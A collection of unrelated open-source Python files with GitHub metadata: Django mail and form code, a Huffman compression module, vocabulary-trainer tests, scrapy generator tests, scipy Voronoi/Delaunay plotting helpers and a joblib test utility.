context = {'recipient': 'John Smith', 'sender': 'Dima Kurguzov'}
msg = Message(template_context=context)
self.assertEqual('Test', msg.template_context['reason'])
self.assertEqual('Dima Kurguzov', msg.template_context['sender'])
self.assertEqual('John Smith', msg.template_context['recipient'])
def test_use_template_context_to(self):
context = {'recipient': 'John Smith', 'sender': 'Dima Kurguzov'}
msg = Message(template_context=context)
self.assertIn('John Smith', msg.body)
self.assertIn('Dima Kurguzov', msg.body)
def test_instance_does_not_override_original_context(self):
original = Message.template_context
instance = Message(template_context={'extra': 'value'})
self.assertNotEqual(original, instance.template_context)
import warnings
from mail_utils import TemplateMessageMixin
class OldMessage(TemplateMessageMixin, EmailMessage):
template_name = 'email.html'
class TemplateMessageMixinTestCase(TestCase):
def test_warning(self):
warnings.simplefilter('always')
with warnings.catch_warnings(record=True) as w:
OldMessage()
assert len(w) == 1
| {
"content_hash": "3504448207bd5d3d3d27e370f58ec16a",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 37.36363636363637,
"alnum_prop": 0.7031630170316302,
"repo_name": "koorgoo/django-mail-utils",
"id": "6475f32e7c243247e3cb2799dd21197eb479ee5a",
"size": "2877",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_template_mixin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "145"
},
{
"name": "Python",
"bytes": "11337"
}
],
"symlink_target": ""
} |
import os
import marshal
import cPickle
import array
class HuffmanNode(object):
recurPrint = False
def __init__(self, ch=None, fq=None, lnode=None, rnode=None, parent=None):
self.L = lnode
self.R = rnode
self.p = parent
self.c = ch
self.fq = fq
def __repr__(self):
if HuffmanNode.recurPrint:
lnode = self.L if self.L else '#'
rnode = self.R if self.R else '#'
return ''.join( ('(%s:%d)'%(self.c, self.fq), str(lnode), str(rnode) ) )
else:
return '(%s:%d)'%(self.c, self.fq)
def __cmp__(self, other):
if not isinstance(other, HuffmanNode):
return super(HuffmanNode, self).__cmp__(other)
return cmp(self.fq, other.fq)
def _pop_first_two_nodes(nodes):
if len(nodes)>1:
first=nodes.pop(0)
second=nodes.pop(0)
return first, second
else:
#print "[popFirstTwoNodes] nodes's length <= 1"
return nodes[0], None
def _build_tree(nodes):
nodes.sort()
while(True):
first, second = _pop_first_two_nodes(nodes)
if not second:
return first
parent = HuffmanNode(lnode=first, rnode=second, fq=first.fq+second.fq)
first.p = parent
second.p = parent
nodes.insert(0, parent)
nodes.sort()
def _gen_huffman_code(node, dict_codes, buffer_stack=[]):
if not node.L and not node.R:
dict_codes[node.c] = ''.join(buffer_stack)
return
buffer_stack.append('0')
_gen_huffman_code(node.L, dict_codes, buffer_stack)
buffer_stack.pop()
buffer_stack.append('1')
_gen_huffman_code(node.R, dict_codes, buffer_stack)
buffer_stack.pop()
def _cal_freq(long_str):
from collections import defaultdict
d = defaultdict(int)
for c in long_str:
d[c] += 1
return d
MAX_BITS = 8
class Encoder(object):
def __init__(self, filename_or_long_str=None):
if filename_or_long_str:
if os.path.exists(filename_or_long_str):
self.encode(filename_or_long_str)
else:
#print '[Encoder] take \'%s\' as a string to be encoded.'\
# % filename_or_long_str
self.long_str = filename_or_long_str
def __get_long_str(self):
return self._long_str
def __set_long_str(self, s):
self._long_str = s
if s:
self.root = self._get_tree_root()
self.code_map = self._get_code_map()
self.array_codes, self.code_length = self._encode()
long_str = property(__get_long_str, __set_long_str)
def _get_tree_root(self):
d = _cal_freq(self.long_str)
return _build_tree(
[HuffmanNode(ch=ch, fq=int(fq)) for ch, fq in d.iteritems()]
)
def _get_code_map(self):
a_dict={}
_gen_huffman_code(self.root, a_dict)
return a_dict
def _encode(self):
array_codes = array.array('B')
code_length = 0
buff, length = 0, 0
for ch in self.long_str:
code = self.code_map[ch]
for bit in list(code):
if bit=='1':
buff = (buff << 1) | 0x01
else: # bit == '0'
buff = (buff << 1)
length += 1
if length == MAX_BITS:
array_codes.extend([buff])
buff, length = 0, 0
code_length += len(code)
if length != 0:
array_codes.extend([buff << (MAX_BITS-length)])
return array_codes, code_length
def encode(self, filename):
fp = open(filename, 'rb')
self.long_str = fp.read()
fp.close()
def write(self, filename):
if self._long_str:
fcompressed = open(filename, 'wb')
marshal.dump(
(cPickle.dumps(self.root), self.code_length, self.array_codes),
fcompressed)
fcompressed.close()
else:
print "You haven't set 'long_str' attribute."
class Decoder(object):
def __init__(self, filename_or_raw_str=None):
if filename_or_raw_str:
if os.path.exists(filename_or_raw_str):
filename = filename_or_raw_str
self.read(filename)
else:
print '[Decoder] take \'%s\' as raw string' % filename_or_raw_str
raw_string = filename_or_raw_str
unpickled_root, length, array_codes = marshal.loads(raw_string)
self.root = cPickle.loads(unpickled_root)
self.code_length = length
self.array_codes = array.array('B', array_codes)
def _decode(self):
string_buf = []
total_length = 0
node = self.root
for code in self.array_codes:
buf_length = 0
while (buf_length < MAX_BITS and total_length != self.code_length):
buf_length += 1
total_length += 1
if code >> (MAX_BITS - buf_length) & 1:
node = node.R
if node.c:
string_buf.append(node.c)
node = self.root
else:
node = node.L
if node.c:
string_buf.append(node.c)
node = self.root
return ''.join(string_buf)
def read(self, filename):
fp = open(filename, 'rb')
unpickled_root, length, array_codes = marshal.load(fp)
self.root = cPickle.loads(unpickled_root)
self.code_length = length
self.array_codes = array.array('B', array_codes)
fp.close()
def decode_as(self, filename):
decoded = self._decode()
fout = open(filename, 'wb')
fout.write(decoded)
fout.close()
if __name__=='__main__':
original_file = 'filename.txt'
compressed_file = 'compressed.scw'
decompressed_file = 'filename2.txt'
# first way to use Encoder/Decoder
enc = Encoder(original_file)
enc.write(compressed_file)
dec = Decoder(compressed_file)
dec.decode_as(decompressed_file)
# second way
#enc = Encoder()
#enc.encode(original_file)
#enc.write(compressed_file)
#dec = Decoder()
#dec.read(compressed_file)
#dec.decode_as(decompressed_file)
| {
"content_hash": "9d698f9f7d8eb7b0b0cdf90a0bf47fc2",
"timestamp": "",
"source": "github",
"line_count": 206,
"max_line_length": 84,
"avg_line_length": 31.07766990291262,
"alnum_prop": 0.5292096219931272,
"repo_name": "fepe55/RAMB0",
"id": "81437c039dfb3f20319a4b2896ec69b86b1527f8",
"size": "6447",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/huffman2.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10472"
}
],
"symlink_target": ""
} |
import builtins
import os
import tempfile
import unittest
from mock import patch, sentinel # noqa
from pylancard import cli
from pylancard import store
from pylancard import trainer
from pylancard.plugins import base as plugins_base
from pylancard.plugins import cz as lang_cz
class FakeStore(store.Store):
def __init__(self):
self.languages = ('1', '2')
self.direct_index = {
'word1': 'meaning1',
'word2': 'meaning2',
}
self.reverse_index = {
'meaning1': 'word1',
'meaning2': 'word2',
}
self.original_plugin = plugins_base.BaseLanguage(self)
self.meaning_plugin = plugins_base.BaseLanguage(self)
class StoreMixin:
def setUp(self):
super().setUp()
self.store = FakeStore()
@patch.object(plugins_base.BaseLanguage, 'convert_word',
side_effect=lambda x: x)
class TestStore(StoreMixin, unittest.TestCase):
def test_add(self, convert_mock):
self.store.add('word3', 'meaning3')
self.assertEqual('meaning3', self.store.direct_index['word3'])
self.assertEqual('word3', self.store.reverse_index['meaning3'])
convert_mock.assert_any_call('word3')
convert_mock.assert_any_call('meaning3')
def test_add_no_overwrite(self, convert_mock):
self.assertRaises(KeyError, self.store.add, 'word1', 'meaning3')
self.assertEqual('meaning1', self.store.direct_index['word1'])
self.assertEqual('word1', self.store.reverse_index['meaning1'])
convert_mock.assert_any_call('word1')
convert_mock.assert_any_call('meaning3')
def test_add_overwrite(self, convert_mock):
self.store.add('word1', 'meaning3', may_overwrite=True)
self.assertEqual('meaning3', self.store.direct_index['word1'])
self.assertEqual('word1', self.store.reverse_index['meaning3'])
convert_mock.assert_any_call('word1')
convert_mock.assert_any_call('meaning3')
def test_delete(self, convert_mock):
self.store.delete('word1')
self.assertNotIn('word1', self.store.direct_index)
self.assertNotIn('meaning1', self.store.reverse_index)
convert_mock.assert_called_once_with('word1')
def test_delete_not_found(self, convert_mock):
self.assertRaises(KeyError, self.store.delete, 'word??')
convert_mock.assert_called_once_with('word??')
def test_delete_silent(self, convert_mock):
orig_direct = self.store.direct_index.copy()
orig_reverse = self.store.reverse_index.copy()
self.store.delete('word??', silent=True)
self.assertEqual(orig_direct, self.store.direct_index)
self.assertEqual(orig_reverse, self.store.reverse_index)
convert_mock.assert_called_once_with('word??')
class TestStoreIO(unittest.TestCase):
def setUp(self):
super().setUp()
self.dir = tempfile.mkdtemp()
def test_create_open(self):
filename = os.path.join(self.dir, 'file')
store.create(filename, ('cz', 'Oo'))
new_store = store.Store(filename)
self.assertEqual(('cz', 'Oo'), new_store.languages)
self.assertEqual({}, new_store.direct_index)
self.assertEqual({}, new_store.reverse_index)
self.assertIsInstance(new_store.original_plugin, lang_cz.Czech)
self.assertIsInstance(new_store.meaning_plugin,
plugins_base.BaseLanguage)
def test_create_open_save(self):
filename = os.path.join(self.dir, 'file')
store.create(filename, ('cz', 'Oo'))
with store.Store(filename) as new_store:
new_store.direct_index['word'] = 'meaning'
new_store = store.Store(filename)
self.assertEqual({'word': 'meaning'}, new_store.direct_index)
self.assertEqual({'meaning': 'word'}, new_store.reverse_index)
class TestTrainer(StoreMixin, unittest.TestCase):
def test_unexpected_kind(self):
self.assertRaises(ValueError, trainer.Trainer, self.store, "42")
def test_direct_next(self):
tr = trainer.Trainer(self.store, trainer.DIRECT)
for _ in range(10):
challenge = tr.next()
self.assertIn(challenge, self.store.direct_index)
self.assertEqual(challenge, tr.challenge)
self.assertEqual(self.store.direct_index[challenge], tr.answer)
def test_reverse_next(self):
tr = trainer.Trainer(self.store, trainer.REVERSE)
for _ in range(10):
challenge = tr.next()
self.assertIn(challenge, self.store.reverse_index)
self.assertEqual(challenge, tr.challenge)
self.assertEqual(self.store.reverse_index[challenge], tr.answer)
@patch.object(plugins_base.BaseLanguage, 'convert_word')
def test_check(self, convert_mock):
convert_mock.side_effect = lambda word: word
tr = trainer.Trainer(self.store, trainer.DIRECT)
tr.next()
self.assertTrue(tr.check(tr.answer))
self.assertFalse(tr.check(tr.answer + 'x'))
convert_mock.assert_any_call(tr.answer)
convert_mock.assert_any_call(tr.answer + 'x')
class TestBaseLanguage(unittest.TestCase):
def test_convert_word(self):
class Test(plugins_base.BaseLanguage):
patterns = {'bb': 'BB'}
self.assertEqual('aBBccBB', Test(None).convert_word('abbccbb'))
def test_present(self):
self.assertFalse(plugins_base.BaseLanguage(None).present)
desc = type('Test', (plugins_base.BaseLanguage,), {})
self.assertTrue(desc.present)
@patch.object(store.Store, 'add')
class TestCliAdd(StoreMixin, unittest.TestCase):
def test_add_one(self, add_mock):
cli.add('add', self.store, ['word3=meaning3'])
add_mock.assert_called_once_with('word3', 'meaning3',
may_overwrite=False)
def test_add_one_overwrite(self, add_mock):
cli.add('add!', self.store, ['word3=meaning3'])
add_mock.assert_called_once_with('word3', 'meaning3',
may_overwrite=True)
@patch.object(store.Store, 'delete')
class TestCliDelete(StoreMixin, unittest.TestCase):
def test_delete(self, delete_mock):
cli.delete('delete', self.store, ['word1'])
delete_mock.assert_called_once_with('word1')
def test_delete_multi(self, delete_mock):
cli.delete('delete', self.store, ['word1', 'word2'])
delete_mock.assert_any_call('word1')
delete_mock.assert_any_call('word2')
@patch.object(builtins, 'print')
def test_delete_not_found(self, print_mock, delete_mock):
delete_mock.side_effect = KeyError
cli.delete('delete', self.store, ['word??', 'word'])
print_mock.assert_called_once_with(
"ERROR: `delete`: word 'word??' was not found")
delete_mock.assert_called_once_with('word??')
@patch.object(builtins, 'print')
class TestCliList(StoreMixin, unittest.TestCase):
def test_list(self, print_mock):
cli.list_('list', self.store, [])
print_mock.assert_any_call("word1\tmeaning1")
print_mock.assert_any_call("word2\tmeaning2")
self.assertEqual(2, print_mock.call_count)
@patch.object(builtins, 'input')
@patch.object(builtins, 'print')
@patch.object(trainer, 'Trainer')
class TestCliTrainer(unittest.TestCase):
def test_train(self, trainer_mock, print_mock, input_mock):
trainer_mock.return_value.next.return_value = 'word'
input_mock.side_effect = EOFError()
cli.train('cmd', sentinel.store, [])
trainer_mock.return_value.next.assert_called_once_with()
print_mock.assert_any_call("Next word: word")
def test_correct(self, trainer_mock, print_mock, input_mock):
trainer_mock.return_value.next.side_effect = ['word1', 'word2']
trainer_mock.return_value.check.return_value = True
input_mock.side_effect = ['word1', EOFError()]
cli.train('cmd', sentinel.store, [])
trainer_mock.return_value.next.assert_called_with()
self.assertEqual(2, trainer_mock.return_value.next.call_count)
print_mock.assert_any_call("Next word: word1")
print_mock.assert_any_call("Next word: word2")
def test_incorrect(self, trainer_mock, print_mock, input_mock):
trainer_mock.return_value.next.return_value = 'word'
trainer_mock.return_value.check.return_value = False
input_mock.side_effect = ['word1', EOFError()]
cli.train('cmd', sentinel.store, [])
trainer_mock.return_value.next.assert_called_once_with()
print_mock.assert_any_call("Next word: word")
print_mock.assert_any_call("Wrong, try again")
def test_skip(self, trainer_mock, print_mock, input_mock):
trainer_mock.return_value.next.side_effect = ['word1', 'word2']
input_mock.side_effect = ['/skip', EOFError()]
cli.train('cmd', sentinel.store, [])
trainer_mock.return_value.next.assert_called_with()
self.assertEqual(2, trainer_mock.return_value.next.call_count)
self.assertFalse(trainer_mock.return_value.check.called)
print_mock.assert_any_call("Next word: word1")
print_mock.assert_any_call("Next word: word2")
def test_quit(self, trainer_mock, print_mock, input_mock):
trainer_mock.return_value.next.return_value = 'word'
input_mock.return_value = '/quit'
cli.train('cmd', sentinel.store, [])
trainer_mock.return_value.next.assert_called_once_with()
self.assertFalse(trainer_mock.return_value.check.called)
| {
"content_hash": "2a1f3161c7209c8226968f84ca5f3f19",
"timestamp": "",
"source": "github",
"line_count": 246,
"max_line_length": 76,
"avg_line_length": 39.03252032520325,
"alnum_prop": 0.6435117683815872,
"repo_name": "dtantsur/pylancard",
"id": "0df01a3bdd7e4a842da9545a40e7e2c428e63b6f",
"size": "9602",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pylancard/test.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "18267"
}
],
"symlink_target": ""
} |
import unittest
import warnings
from functools import partial
from unittest import mock
from scrapy.utils.misc import is_generator_with_return_value, warn_on_generator_with_return_value
def _indentation_error(*args, **kwargs):
raise IndentationError()
def top_level_return_something():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return 1
def top_level_return_none():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return
def generator_that_returns_stuff():
yield 1
yield 2
return 3
class UtilsMiscPy3TestCase(unittest.TestCase):
def test_generators_return_something(self):
def f1():
yield 1
return 2
def g1():
yield 1
return "asdf"
def h1():
yield 1
def helper():
return 0
yield helper()
return 2
def i1():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return 1
assert is_generator_with_return_value(top_level_return_something)
assert is_generator_with_return_value(f1)
assert is_generator_with_return_value(g1)
assert is_generator_with_return_value(h1)
assert is_generator_with_return_value(i1)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_something)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.top_level_return_something" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, f1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.f1" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, g1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.g1" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, h1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.h1" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, i1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.i1" method is a generator', str(w[0].message))
def test_generators_return_none(self):
def f2():
yield 1
return None
def g2():
yield 1
return
def h2():
yield 1
def i2():
yield 1
yield from generator_that_returns_stuff()
def j2():
yield 1
def helper():
return 0
yield helper()
def k2():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return
def l2():
return
assert not is_generator_with_return_value(top_level_return_none)
assert not is_generator_with_return_value(f2)
assert not is_generator_with_return_value(g2)
assert not is_generator_with_return_value(h2)
assert not is_generator_with_return_value(i2)
assert not is_generator_with_return_value(j2) # not recursive
assert not is_generator_with_return_value(k2) # not recursive
assert not is_generator_with_return_value(l2)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_none)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, f2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, g2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, h2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, i2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, j2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, k2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, l2)
self.assertEqual(len(w), 0)
def test_generators_return_none_with_decorator(self):
def decorator(func):
def inner_func():
func()
return inner_func
@decorator
def f3():
yield 1
return None
@decorator
def g3():
yield 1
return
@decorator
def h3():
yield 1
@decorator
def i3():
yield 1
yield from generator_that_returns_stuff()
@decorator
def j3():
yield 1
def helper():
return 0
yield helper()
@decorator
def k3():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return
@decorator
def l3():
return
assert not is_generator_with_return_value(top_level_return_none)
assert not is_generator_with_return_value(f3)
assert not is_generator_with_return_value(g3)
assert not is_generator_with_return_value(h3)
assert not is_generator_with_return_value(i3)
assert not is_generator_with_return_value(j3) # not recursive
assert not is_generator_with_return_value(k3) # not recursive
assert not is_generator_with_return_value(l3)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_none)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, f3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, g3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, h3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, i3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, j3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, k3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, l3)
self.assertEqual(len(w), 0)
@mock.patch("scrapy.utils.misc.is_generator_with_return_value", new=_indentation_error)
def test_indentation_error(self):
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_none)
self.assertEqual(len(w), 1)
self.assertIn('Unable to determine', str(w[0].message))
def test_partial(self):
def cb(arg1, arg2):
yield {}
partial_cb = partial(cb, arg1=42)
assert not is_generator_with_return_value(partial_cb)
| {
"content_hash": "10052caf313c960dae9923562d29f99b",
"timestamp": "",
"source": "github",
"line_count": 264,
"max_line_length": 111,
"avg_line_length": 30.852272727272727,
"alnum_prop": 0.5760589318600369,
"repo_name": "scrapy/scrapy",
"id": "562f72fee8bf33dabec0fa1f468d99b8dfd25ccb",
"size": "8145",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_utils_misc/test_return_with_argument_inside_generator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3237"
},
{
"name": "Python",
"bytes": "2021119"
},
{
"name": "Roff",
"bytes": "2010"
},
{
"name": "Shell",
"bytes": "259"
}
],
"symlink_target": ""
} |
import numpy as np
from scipy._lib.decorator import decorator as _decorator
__all__ = ['delaunay_plot_2d', 'convex_hull_plot_2d', 'voronoi_plot_2d']
@_decorator
def _held_figure(func, obj, ax=None, **kw):
import matplotlib.pyplot as plt # type: ignore[import]
if ax is None:
fig = plt.figure()
ax = fig.gca()
return func(obj, ax=ax, **kw)
# As of matplotlib 2.0, the "hold" mechanism is deprecated.
# When matplotlib 1.x is no longer supported, this check can be removed.
was_held = getattr(ax, 'ishold', lambda: True)()
if was_held:
return func(obj, ax=ax, **kw)
try:
ax.hold(True)
return func(obj, ax=ax, **kw)
finally:
ax.hold(was_held)
def _adjust_bounds(ax, points):
margin = 0.1 * points.ptp(axis=0)
xy_min = points.min(axis=0) - margin
xy_max = points.max(axis=0) + margin
ax.set_xlim(xy_min[0], xy_max[0])
ax.set_ylim(xy_min[1], xy_max[1])
@_held_figure
def delaunay_plot_2d(tri, ax=None):
"""
Plot the given Delaunay triangulation in 2-D
Parameters
----------
tri : scipy.spatial.Delaunay instance
Triangulation to plot
ax : matplotlib.axes.Axes instance, optional
Axes to plot on
Returns
-------
fig : matplotlib.figure.Figure instance
Figure for the plot
See Also
--------
Delaunay
matplotlib.pyplot.triplot
Notes
-----
Requires Matplotlib.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.spatial import Delaunay, delaunay_plot_2d
The Delaunay triangulation of a set of random points:
>>> points = np.random.rand(30, 2)
>>> tri = Delaunay(points)
Plot it:
>>> _ = delaunay_plot_2d(tri)
>>> plt.show()
"""
if tri.points.shape[1] != 2:
raise ValueError("Delaunay triangulation is not 2-D")
x, y = tri.points.T
ax.plot(x, y, 'o')
ax.triplot(x, y, tri.simplices.copy())
_adjust_bounds(ax, tri.points)
return ax.figure
@_held_figure
def convex_hull_plot_2d(hull, ax=None):
"""
Plot the given convex hull diagram in 2-D
Parameters
----------
hull : scipy.spatial.ConvexHull instance
Convex hull to plot
ax : matplotlib.axes.Axes instance, optional
Axes to plot on
Returns
-------
fig : matplotlib.figure.Figure instance
Figure for the plot
See Also
--------
ConvexHull
Notes
-----
Requires Matplotlib.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.spatial import ConvexHull, convex_hull_plot_2d
The convex hull of a random set of points:
>>> points = np.random.rand(30, 2)
>>> hull = ConvexHull(points)
Plot it:
>>> _ = convex_hull_plot_2d(hull)
>>> plt.show()
"""
from matplotlib.collections import LineCollection # type: ignore[import]
if hull.points.shape[1] != 2:
raise ValueError("Convex hull is not 2-D")
ax.plot(hull.points[:,0], hull.points[:,1], 'o')
line_segments = [hull.points[simplex] for simplex in hull.simplices]
ax.add_collection(LineCollection(line_segments,
colors='k',
linestyle='solid'))
_adjust_bounds(ax, hull.points)
return ax.figure
@_held_figure
def voronoi_plot_2d(vor, ax=None, **kw):
"""
Plot the given Voronoi diagram in 2-D
Parameters
----------
vor : scipy.spatial.Voronoi instance
Diagram to plot
ax : matplotlib.axes.Axes instance, optional
Axes to plot on
show_points: bool, optional
Add the Voronoi points to the plot.
show_vertices : bool, optional
Add the Voronoi vertices to the plot.
line_colors : string, optional
Specifies the line color for polygon boundaries
line_width : float, optional
Specifies the line width for polygon boundaries
line_alpha: float, optional
Specifies the line alpha for polygon boundaries
point_size: float, optional
Specifies the size of points
Returns
-------
fig : matplotlib.figure.Figure instance
Figure for the plot
See Also
--------
Voronoi
Notes
-----
Requires Matplotlib.
Examples
--------
Set of point:
>>> import matplotlib.pyplot as plt
>>> points = np.random.rand(10,2) #random
Voronoi diagram of the points:
>>> from scipy.spatial import Voronoi, voronoi_plot_2d
>>> vor = Voronoi(points)
using `voronoi_plot_2d` for visualisation:
>>> fig = voronoi_plot_2d(vor)
using `voronoi_plot_2d` for visualisation with enhancements:
>>> fig = voronoi_plot_2d(vor, show_vertices=False, line_colors='orange',
... line_width=2, line_alpha=0.6, point_size=2)
>>> plt.show()
"""
from matplotlib.collections import LineCollection
if vor.points.shape[1] != 2:
raise ValueError("Voronoi diagram is not 2-D")
if kw.get('show_points', True):
point_size = kw.get('point_size', None)
ax.plot(vor.points[:,0], vor.points[:,1], '.', markersize=point_size)
if kw.get('show_vertices', True):
ax.plot(vor.vertices[:,0], vor.vertices[:,1], 'o')
line_colors = kw.get('line_colors', 'k')
line_width = kw.get('line_width', 1.0)
line_alpha = kw.get('line_alpha', 1.0)
center = vor.points.mean(axis=0)
ptp_bound = vor.points.ptp(axis=0)
finite_segments = []
infinite_segments = []
for pointidx, simplex in zip(vor.ridge_points, vor.ridge_vertices):
simplex = np.asarray(simplex)
if np.all(simplex >= 0):
finite_segments.append(vor.vertices[simplex])
else:
i = simplex[simplex >= 0][0] # finite end Voronoi vertex
t = vor.points[pointidx[1]] - vor.points[pointidx[0]] # tangent
t /= np.linalg.norm(t)
n = np.array([-t[1], t[0]]) # normal
midpoint = vor.points[pointidx].mean(axis=0)
direction = np.sign(np.dot(midpoint - center, n)) * n
if (vor.furthest_site):
direction = -direction
far_point = vor.vertices[i] + direction * ptp_bound.max()
infinite_segments.append([vor.vertices[i], far_point])
ax.add_collection(LineCollection(finite_segments,
colors=line_colors,
lw=line_width,
alpha=line_alpha,
linestyle='solid'))
ax.add_collection(LineCollection(infinite_segments,
colors=line_colors,
lw=line_width,
alpha=line_alpha,
linestyle='dashed'))
_adjust_bounds(ax, vor.points)
return ax.figure
| {
"content_hash": "c429e28a68ffe1099aff03e3ff719f3e",
"timestamp": "",
"source": "github",
"line_count": 262,
"max_line_length": 77,
"avg_line_length": 26.553435114503817,
"alnum_prop": 0.5755354319390542,
"repo_name": "person142/scipy",
"id": "dfdcec86da3daf949fd3a7c80d657fa29a960134",
"size": "6957",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "scipy/spatial/_plotutils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4399737"
},
{
"name": "C++",
"bytes": "654192"
},
{
"name": "Dockerfile",
"bytes": "1291"
},
{
"name": "Fortran",
"bytes": "5368529"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12769355"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
def return_slice_of_data(arr, start_idx, end_idx):
return arr[start_idx:end_idx]
def print_filename_and_raise(arr):
from joblib._memmapping_reducer import _get_backing_memmap
print(_get_backing_memmap(arr).filename)
raise ValueError
| {
"content_hash": "a7d09f8b39310e5362c827173feb9672",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 62,
"avg_line_length": 31.375,
"alnum_prop": 0.7290836653386454,
"repo_name": "ryfeus/lambda-packs",
"id": "20ec8c1ba0a50da6be9fce3686ac1950b1a55ab5",
"size": "251",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "Sklearn_arm/source/joblib/test/testutils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9768343"
},
{
"name": "C++",
"bytes": "76566960"
},
{
"name": "CMake",
"bytes": "191097"
},
{
"name": "CSS",
"bytes": "153538"
},
{
"name": "Cuda",
"bytes": "61768"
},
{
"name": "Cython",
"bytes": "3110222"
},
{
"name": "Fortran",
"bytes": "110284"
},
{
"name": "HTML",
"bytes": "248658"
},
{
"name": "JavaScript",
"bytes": "62920"
},
{
"name": "MATLAB",
"bytes": "17384"
},
{
"name": "Makefile",
"bytes": "152150"
},
{
"name": "Python",
"bytes": "549307737"
},
{
"name": "Roff",
"bytes": "26398"
},
{
"name": "SWIG",
"bytes": "142"
},
{
"name": "Shell",
"bytes": "7790"
},
{
"name": "Smarty",
"bytes": "4090"
},
{
"name": "TeX",
"bytes": "152062"
},
{
"name": "XSLT",
"bytes": "305540"
}
],
"symlink_target": ""
} |
from django import forms
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.auth.forms import SetPasswordForm, PasswordChangeForm, \
AdminPasswordChangeForm as DjagnoAdminPasswordChangeForm, UserCreationForm, \
AuthenticationForm as DjangoAuthenticationForm
from localflavor.pl.forms import PLPESELField
from django.utils.translation import ugettext_lazy as _
from passwords.fields import PasswordField
from localflavor.pl.forms import PLPESELField
from sew_django.profiles.models import Profile
class ValidatingSetPasswordForm(SetPasswordForm):
new_password1 = PasswordField(label=_("New password"))
new_password2 = PasswordField(label=_("New password confirm"))
class ValidatingPasswordChangeForm(PasswordChangeForm):
new_password1 = PasswordField(label=_("New password"))
new_password2 = PasswordField(label=_("New password confirmation"))
class AdminPasswordChangeForm(DjagnoAdminPasswordChangeForm):
password1 = PasswordField(label=_("New password"))
password2 = PasswordField(label=_("New password confirm"))
class AuthenticationForm(DjangoAuthenticationForm):
def __init__(self, *args, **kwargs):
super(AuthenticationForm, self).__init__(*args, **kwargs)
self.fields['username'].label = _(u"Numer PESEL lub adres email")
self.error_messages['invalid_login'] = _(u"Wprowadź poprawny numer PESEL lub adres email.")
class PeselForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['pesel',]
class RegisterUserFullForm(forms.ModelForm):
password = PasswordField(label=_("Password"))
password_confirm = PasswordField(label=_("Password confirmation"))
def __init__(self, *args, **kwargs):
super(RegisterUserFullForm, self).__init__(*args, **kwargs)
self.fields['consent_processing_of_personal_data'].is_checkbox = True
self.fields['consent_processing_of_personal_data'].required = True
self.fields['consent_processing_of_personal_data'].initial = False
self.fields['accept_of_sending_data_to_WOSP'].is_checkbox = True
